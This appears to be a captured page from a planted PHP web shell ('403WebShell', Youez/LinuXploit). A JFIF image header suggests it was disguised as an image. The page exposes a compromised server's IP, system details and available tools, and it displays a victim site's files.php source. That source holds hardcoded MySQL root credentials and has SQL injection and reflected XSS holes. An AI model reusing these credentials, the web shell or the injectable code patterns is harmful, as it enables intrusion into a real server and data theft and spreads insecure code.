????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.57
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/project/files.php
<?php
	session_start();
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");
	$showAll = "true";
	$ProjectId = $_GET['projectId'];
	
	$CompanyId = $_SESSION['ASTACUS_SSO_INFO'][4];

	$sql = "SELECT * FROM Project, ProjectStatus WHERE Project.ProjectStatusId = ProjectStatus.ProjectStatusId and ProjectId = $ProjectId";

   
    $result = mysql_query($sql);
	  
	  while ($row = mysql_fetch_assoc($result)){ 
	  	$CompanyId =  $row['CompanyId'];
		$ProjectName =  $row['Name'];
		$Description =  $row['Description'];
		
		$ProjectStatusId = $row['ProjectStatusId'];
		$InvoiceText = $row['invoiceText'];
		$createDate = substr($row['createDate'],0,10);
		$ProjectTypeId = $row['ProjectTypeId'];
		$scheduledDeliveryToCustomer = $row['scheduledDeliveryToCustomer'];
		$RequestedDeliveryDate= $row['RequestedDeliveryDate'];
		$scheduledDelivery = substr($row['scheduledDelivery'],0,10);
		$JobTypeId = $row['JobTypeId'];
		$Clinet = $row['clientProjectManagerEmail'];
		$OB = $row['orderConfirmationSent'];
		
		$ProductionManagerId =  $row['SystemUserIdProductionManager'];
		
		
	  }
	  	$UserGroupId = $_SESSION['ASTACUS_SSO_INFO'][3];
		
		$sql = "SELECT * FROM ProjectManager WHERE ProjectId = $ProjectId";

   
   	 $result = mysql_query($sql);
	  
	  while ($row = mysql_fetch_assoc($result)){ 
	  	$ProjectManagerId =  $row['UserId'];
	  }
	  
	  $sql = "SELECT * FROM SystemUser WHERE SystemUserId = $ProductionManagerId";

 
   	 $result = mysql_query($sql);
	  
	  while ($row = mysql_fetch_assoc($result)){ 
	  	$ProductionManager =  $row['Username'];
	  }
	  
	  
	  
	  if($ProjectStatusId == 18){
	  	$color = "#FF0000";
		
		$status = "Skapat av kund";
	 }else if($ProjectStatusId  == 1) {
		$color = "#ffc600";
		$status = $a33;
		 }else if($ProjectStatusId  == 6) {
		$color = "#EEEEEE";
		$status = "I Produktion";
	 }else if($ProjectStatusId  == 8) {
		$color = "#00FF00";
		$status = $a31;
	}else if($ProjectStatusId  == 4) {
		$color = "#EEEEEE";
		$status = $a35;
	 }else if($ProjectStatusId  == 9 || $ProjectStatusId  == 10) {
		$color = "#0099FF";
		$status = $a36;
		 }else if($ProjectStatusId  == 14) {
		$color = "#9966FF";
		$status = $a32;
		}else{
		$status = $a100;
	 	 $color = "#ffffff";
	 }

?>
<link rel="stylesheet" type="text/css" href="dhtmlxCalendar/codebase/dhtmlxcalendar.css"/>
<script src="dhtmlxCalendar/codebase/dhtmlxcalendar.js"></script>
<link href="../main.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
#calendar_icon {	
	vertical-align: middle;
			cursor: pointer;
}
-->
</style>



<script>


function setDeliveryDate(delivertoclient){

	var d = document.getElementById("deliverydate").value
	
	
			location.href = "updateDeliveryDateToCustomer.php?page=<?php echo($_GET['page']);?>&projectId=<?php echo($ProjectId);?>&date="+d;

}

var myCalendar;
		function doOnLoad() {
			myCalendar = new dhtmlXCalendarObject({input: "deliverydate", button: "calendar_icon"});
		}
<?php

if($_GET['showmessage'] != ""){
echo("alert('".$_GET['showmessage']."');");
}

?>

function updateProjectName(){
	var projectname = document.getElementById("projectname").value;
	location.href = "updateProjectName.php?page=project&projectId=<?php echo($ProjectId);?>&name="+projectname
	
}
function selectAll(){
		var tags = document.getElementsByName('selectedfiles[]');
for(var i = 0; i < tags.length; ++i)
{
	if( tags[i].checked == 1){
  		tags[i].checked = 0;
	}else{
		 tags[i].checked = 1;	
	}
}
}
function edituser(){
			var selObj = document.getElementById("customer");
			
			var IDs = selObj.options[selObj.selectedIndex].value;
			var ProjectId = IDs.split("#")[0];
			var systemUserId = IDs.split("#")[1];
			
			if(selObj.value != ""){
				location.href = "?page=user&action=edit&systemUserId="+systemUserId+"&goto=project&projectId="+ProjectId;
			}else{
				alert("Du m�ste markera en anv�ndare!");
			}
		}
		
		function mailuser(proj){
			var selObj = document.getElementById("customer");
			
			if(selObj.value != ""){
				location.href = "mailto:"+selObj.selectedOptions[0].text+"?subject="+proj;
			}else{
				alert("Du m�ste markera en anv�ndare!");
			}
			
			}
		
		function createFolder()
    {
        stuff = prompt("Ange ett namn p� den nya mappen:", "");
		
		
		if (stuff) {
		//alert("createfolder.php?projectId=<?php echo($ProjectId);?>&path=<?php echo(urlencode($_GET['path']));?>&foldername=" + escape(stuff));
             document.location.href="createfolder.php?page=project&projectId=<?php echo($ProjectId);?>&path=<?php echo(urlencode($_GET['path']));?>&foldername=" + escape(stuff);
        }
	
	}
	
	function deleteFile(stuff){
			
			
			 if(<?php echo($language);?> == 2 || <?php echo($language);?> == 3){
	    var retVal = confirm("Do you really want to delete the file/folder?");
	  }else{
	    var retVal = confirm("Vill du verkligen ta bort filen/mappen?");
	  }
		   
		if( retVal == true ){
			 document.location.href= stuff;
			 return true;
		}
	
			
			
		}
		
		function updateStatus(selObj,id){
			
			
				
		var str = window.location.href.split("?")[1];
		var param = str = str.replace(/&/g, 'EE');
			
			var IDs = selObj.options[selObj.selectedIndex].value;
			var ProjectId = IDs.split("#")[0];
			var StatusId = IDs.split("#")[1];
		
	
		
		location.href = "updateStatus.php?projectId="+ProjectId+"&statusId="+StatusId+"&params="+param+"&ID="+id;
	
		
		
		
}

</script>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="90">&nbsp;</td>
    <td width="820"><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td colspan="5" valign="top">          <table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr >
              <td colspan="4" valign="top" class="text"><span class="heading1"></span>
                <table width="100%" border="0" cellpadding="0" cellspacing="0">
                  <tr valign="top">
                    <td><span class="heading3"><?php echo($CompanyId);?>_ 
                      
                      <input name="projectname" type="text" class="heading3" id="projectname" value="<?php echo($ProjectName);?>" size="30" />
                      (<?php echo($ProjectId);?>)</span><span class="text">
                      <input name="button3" type="button" class="heading3" id="button3" value="Save" style="width:75;height:30" onclick="updateProjectName();" />
                      <br />
                      <br>
                      </span><span class="text">                      <br>                    
                        </span>                      <div align="right"><span class="textthin"><br>
                      </span> </div></td>
                    <td align="right"><span class="heading1"><a href="javascript:history.back(-1);"><img src="../images/Back-Arrow.jpg" alt="" width="37" height="36" border="0" align="absmiddle" /></a> <a href="javascript:history.back(-1);" class="blacklinkhuge">Back</a></span></td>
                    </tr>
                  <tr valign="top">
                    <td colspan="2"><table width="100%" height="30" border="0" cellpadding="0" cellspacing="0">
                      <tr>
                        <td width="52" rowspan="2" valign="middle"><table width="45" height="45" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" class="textthin">
                          <tr>
                            <td bgcolor="<?php echo($color);?>">&nbsp;</td>
                          </tr>
                        </table></td>
                        <td width="168" valign="middle"><select name="status" id="status" onchange="updateStatus(this,'ProjectStatusId');">
                          <?php 		
					  
					  $sql = "SELECT * FROM ProjectStatus where Hidden = 0";
	 
	 	
						 $result2 = mysql_query($sql);
						$was_sel = false;
						  while ($row2 = mysql_fetch_assoc($result2)){ 
						   $sel = "";
						  	if($row2['ProjectStatusId'] == $ProjectStatusId){
								$sel ="selected";
								$was_sel = true;
							}
							
							
							 echo("<option ".$sel." value='".$ProjectId."#".$row2['ProjectStatusId']."'>".$row2['ProjectStatusDisplayValue']."</option>");
						  }
						  
						  if($was_sel == ""){
							   echo("<option selected value='1'>V&Auml;LJ</option>");
							 }
		?>
                        </select></td>
                        <td width="313" valign="middle"><span class="style6"> Client:
                            <select name="customer" id="customer" onchange="updateStatus(this,'SystemUserId');">
                            <option value="">Choose</option>
                            <?php 		
					  
					  $sql = "SELECT * FROM SystemUser where CompanyId = '".$CompanyId."'";
	 
	 	
						 $result = mysql_query($sql);
						 $AstacusPM = "";
						  while ($row = mysql_fetch_assoc($result)){ 
						  $sel = "";
						  	if($row['Username'] == $Clinet){
								$sel ="selected";
							}
						  
							 echo("<option ".$sel." value='".$ProjectId."#".$row['SystemUserId']."'>".$row['Username']."</option>");
						  }
		?>
                          </select>
                          </select>
                          <a href="javascript:mailuser('<?php echo($CompanyId);?>_<?php echo($ProjectName);?> (<?php echo($ProjectId);?>)');">Mail</a> | <a href="javascript:edituser();">Edit</a> | <a href="?page=user&amp;action=add&amp;projectId=<?php echo($ProjectId);?>&amp;goto=project&amp;companyId=<?php echo($CompanyId);?>">Add</a></span></td>
                        <td width="256" valign="middle"><span class="style6"> Type:
                            <select name="jobtype" id="jobtype" onchange="updateStatus(this,'JobTypeId');">
                            <option value="<?php echo($ProjectId);?>#1"  <?php if($JobTypeId == "1"){echo("selected");}?>>ORDER</option>
                            <option value="<?php echo($ProjectId);?>#2"  <?php if($JobTypeId == "2"){echo("selected");}?>>RFQ</option>
                          </select>
                          OB:
                          <select name="jobtype2" id="jobtype2" onchange="updateStatus(this,'orderConfirmationSent');">
                            <option value="<?php echo($ProjectId);?>#0"  <?php if($OB == "0"){echo("selected");}?>>NO</option>
                            <option value="<?php echo($ProjectId);?>#1"  <?php if($OB == "1"){echo("selected");}?>>YES</option>
                          </select>
                        </span></td>
                        <td width="257" align="right" valign="middle" class="style6">Project Type:
                          <select name="type" id="type" onchange="updateStatus(this,'ProjectTypeId');">
                            <option value="0">Choose</option>
                            <?php 		
					  
					  $sql = "SELECT * FROM ProjectType where ProjectTypeId >=20;";
	 
	 	
						 $result = mysql_query($sql);
						
						  while ($row = mysql_fetch_assoc($result)){ 
						   $sel = "";
						  	if($row['ProjectTypeId'] == $ProjectTypeId){
								$sel ="selected";
							}
							
							 echo("<option ".$sel." value='".$ProjectId."#".$row['ProjectTypeId']."'>".$row['ProjectTypeDisplayValue']."</option>");
						  }
		?>
                          </select></td>
                      </tr>
                      <tr>
                        <td width="168" valign="middle"><span class="style6">Create date: <?php echo($createDate);?></span></td>
                        <td width="313" valign="middle"><span class="style6">Delivery from production: <?php echo($scheduledDelivery);?></span></td>
                        <td valign="middle"><span class="style6">Delivery date:
                          <?php 
						  
						$RDate = $scheduledDeliveryToCustomer;
					if($RDate != ""){
						//echo("V ".date("W",strtotime($row['scheduledDeliveryToCustomer'])));
						$d_pr= (substr($RDate,0,10));
						
					}else{

						$RDate = $RequestedDeliveryDate;
						$d_pr= (substr($RDate,0,10)."*");
					
					}
						  ?>
                          <input name="deliverydate" type="text" id="deliverydate" size="12" value="<?php echo($d_pr);?>" />
                          <span><img src="calendar.gif" alt="" id="calendar_icon" border="0" />
                            <input type="button" name="button4" id="button4" value="Spara" onclick="setDeliveryDate('<?php echo(substr($RequestedDeliveryDate,0,10));?>');"/>
                          </span></span></td>
                        <td width="257" align="right" valign="middle" class="style6">Project Manager:
                          <select name="select4" id="select4" onchange="updateStatus(this,'ProjectManagerId');">
                            <option>V&Auml;LJ</option>
                            <?php 		
					  
					  $sql = "SELECT * FROM SystemUser where UserGroupID = 5 or UserGroupID = 8;";
	 
	 	
						 $result = mysql_query($sql);
						 $AstacusPM = "";
						  while ($row = mysql_fetch_assoc($result)){ 
						  //ProjectManagerId
						   $sel = "";
						  	if($row['SystemUserId'] == $ProjectManagerId){
								$sel ="selected";
							}
							 echo("<option ".$sel." value='".$ProjectId."#".$row['SystemUserId']."'>".$row['Username']."</option>");
						  }
		?>
                          </select>
                          </select></td>
                      </tr>
                    </table>                      <p>&nbsp;</p></td>
                  </tr>
                </table></td>
            </tr>
          </table>
          <span class="heading2"><br>
          </span>
          <table width="100%" height="100" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td width="431" valign="top"><form id="form1" name="form1" method="post" action="updateDescription.php?projectId=<?php echo($ProjectId);?>&page=project&type=invoice">
                <span class="style6">Internal information:</span><br />
				  <textarea name="description" id="description" cols="55" rows="6"><?php echo($InvoiceText);?></textarea>
				  <br />
				  <input type="submit" name="button2" id="button2" value="Save" />
				  <span class="heading2"><br>
                  </span><span class="heading2">                </span>
              </form></td>
              <td width="25">&nbsp;</td>
              <td width="575" valign="top"><script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
                <table width="600" border="0" align="right" cellpadding="0" cellspacing="0">
                    <tr>
                      <td align="right"><form id="form1" name="form1" method="post" action="updateDescription.php?projectId=<?php echo($ProjectId);?>&page=project&type=regular">
                        <span class="style6"> SoW:</span><br />
                      <textarea name="description" id="description" cols="70" rows="6"><?php echo($Description);?></textarea>
                      <br />
                      <input type="submit" name="button" id="button" value="Save" /> 
                      <input name="sendmail" type="checkbox" id="sendmail" value="send" checked="checked" />
                      <span class="style6">Send mail to: </span>
                      <span class="style6"> <a href="mailto:<?php echo($ProductionManager);?>?subject=<?php echo($CompanyId);?>_<?php echo($ProjectName);?> (<?php echo($ProjectId);?>)"><?php echo($ProductionManager);?></a></span>
                      </form></td>
                    </tr>
                  </table></td></tr>
          </table>
          <hr size="1" />

          <p><span class="heading2"><span class="text">Upload files to path <?php echo($_GET['path']);?></span><br />
              <applet 
  code="com.elementit.JavaPowUpload.Manager"
  archive="../customerzon/JavaPowUpload/lib/JavaPowUpload.jar, ../customerzon/JavaPowUpload/lib/skinlf.jar,
../customerzon/JavaPowUpload/lib/commons-httpclient.jar"
  width="100%"
  height="400"
  name="JavaPowUpload"
  id="JavaPowUpload"
  mayscript="true"
  alt="JavaPowUpload by www.element-it.com"
  viewastext="VIEWASTEXT">
                <param name="Common.SerialNumber" value="007223217425301132124188251418916727310183" />
                <param name="Common.FinishUrl" value="?page=project&amp;projectId=<?php echo($ProjectId);?>&amp;companyId=<?php echo($CompanyId);?>&amp;path=<?php echo($_GET['path'])?>&amp;uploaded=true" />
                <param name="Common.FinishUrl.Target" value="_parent" />
                <!-- Java Plug-In Options -->
                <param name="progressbar" value="true" />
                <param name="boxmessage" value="Loading JavaPowUpload Applet ..." />
                <!--Enable upload mode -->
                <param name="Common.UploadMode" value="true" />
                <param name="Upload.HttpUpload.FieldName.FilePath" value="SelectedPath_#COUNTER#">
                <!--Set url to file processing script -->
            
                
                      <param name="Upload.UploadUrl" value="DirUpload.php?projectId=<?php echo($ProjectId);?>&customerId=<?php echo($CompanyId);?>&path=<?php echo(urlencode($_GET['path']));?>">
          
                <param name="Upload.HttpUpload.MaxFilesCountPerRequest" value="1" />
                <param name="Common.SkinLF.ThemepackURL" value="../customerzon/JavaPowUpload/lib/themepack.zip" />
                <!-- This text will be shown if applet not working or Java not installed-->
                <span style="border:1px  solid #FF0000;display:block;padding:5px;margin-top:10px;margin-bottom:10px;text-align:left; background: #FDF2F2;color:#000;">You should <b>enable applets</b> running at browser and to have the <b>Java</b> (JRE) version &gt;= 1.5.<br />
                  If applet is not displaying properly, please check <a target="_blank" href="http://java.com/en/download/help/testvm.xml" title="Check Java applets">additional configurations</a></span>
              </applet>
          </span><br /> 
          <a href="?page=files_new&projectId=<?php echo($ProjectId);?>&path=<?php echo($_GET['path'])?>">Try new upload </a></p>
          <p>&nbsp;</p>
          <p class="style6"><br>
          </p></td>
        </tr>
    </table>      
    </td>
    <td width="90">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="3">&nbsp;    </td>
  </tr>
</table><script>doOnLoad();</script>

Youez - 2016 - github.com/yon3zu
LinuXploit